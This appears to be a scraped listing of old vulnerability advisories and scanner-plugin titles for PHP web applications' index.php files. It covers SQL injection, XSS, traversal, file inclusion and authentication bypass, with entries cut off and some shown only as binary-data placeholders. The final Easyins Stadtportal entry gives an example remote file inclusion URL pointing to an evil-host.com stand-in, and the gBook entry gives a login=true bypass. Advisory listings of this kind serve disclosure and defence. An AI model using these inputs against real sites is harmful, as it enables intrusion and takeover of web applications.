CVE-2005-0217

CVE-2005-0217 affects Invision Community Blog (index.php) with the eid parameter vulnerable to SQL injection. Root cause: unsanitized input in a database query via eid. Impact: partial disclosure/integrity/availability per NVD metrics. Exploitation: remote attackers can execute arbitrary SQL comm...

Sunshop < 3.4RC2 index.php search Parameter XSS

Binary data 2590.prm...

CVE-2004-2222

Directory traversal vulnerability in index.php in FsPHPGallery before 1.2 allows remote attackers to list arbitrary directories via the dir parameter...

CVE-2004-2511

Multiple cross-site scripting XSS vulnerabilities in DCP-Portal 5.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the year, 2 month, and 3 day parameters in calendar.php; 4 the cid and 5 url parameters in index.php; 6 the cid parameter in annoucement.php; 7 the...

CVE-2004-1911

Cross-site scripting XSS vulnerability in AzDGDatingLite 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the 1 l parameter aka language variable to index.php or 2 id parameter to view.php...

CVE-2004-1384

Multiple cross-site scripting XSS vulnerabilities in phpGroupWare 0.9.16.003 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 kp3, 2 type, 3 msg, 4 forumid, 5 pos, 6 catsapp, 7 catid, 8 msgballmsgnum, 9 fldballacctnum parameters to index.php or 10 ticketid to...

CVE-2004-1413

Multiple SQL injection vulnerabilities in Kayako eSupport 2.x allow remote attackers to execute arbitrary SQL commands via the 1 subcat, 2 rate, 3 questiondetails, 4 ticketkey22, 5 email22 parameters to index.php, or 6 the e-mail field of the Forgot Key feature...

CVE-2004-1746

Cross-site scripting XSS vulnerability in index.php in PHP Code Snippet Library allows remote attackers to inject arbitrary web script or HTML via the 1 catselect or 2 show parameters...

PHProxy index.php error Parameter XSS

Binary data 2480.prm...

CVE-2004-1213

The CVE-2004-1213 entry concerns an XSS vulnerability in the index.php of Advanced Guestbook versions 2.3.1, 2.2, and potentially other releases. The issue allows remote attackers to inject arbitrary web scripts or HTML via the entry parameter. The description provided with the CVE states the vul...

Brooky CubeCart < 2.0.2 index.php cat_id Parameter SQL Injection

Binary data 2431.prm...

PowerPortal index.php index_page Parameter SQL Injection

Binary data 2409.prm...

miniBB < 1.7f index.php user Parameter SQL Injection

Binary data 2407.prm...

CVE-2004-1692

Cross-site scripting XSS vulnerability in index.php in Mambo 4.5 1.0.9 allows remote attackers to inject arbitrary web script or HTML via the 1 Itemid, 2 mosmsg, or 3 limit parameters...

PSNews v1.1 index.php Multiple Parameter XSS

Binary data 2266.prm...

CuteNews index.php mod Parameter XSS

The version of CuteNews installed on the remote host is vulnerable to a cross-site scripting XSS attack. An attacker, exploiting this flaw, would need to be able to coerce a user to browse to a purposefully malicious URI. Upon successful exploitation, the attacker would be able to run code within...

CVE-2002-1560

CVE-2002-1560 affects gBook 1.4, where an issue in index.php allows remote attackers to bypass authentication and gain administrative privileges by setting the login parameter to true. The available documents describe the flaw as an authentication bypass with full admin access, but they do not pr...

PHP Code Snippet Library 'index.php' XSS

Binary data 2149.prm...

trixbox Dashboard user/index.php langChoice Parameter Local File Inclusion

Binary data 4577.prm...

Easyins Stadtportal

Easyins Stadtportal v4 and prior seems to be vulnerable to a code inclusion in index.php http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com If anybody could explain it better than me, do it : I'm not a security master, i'm just trying to learn about it : Thank...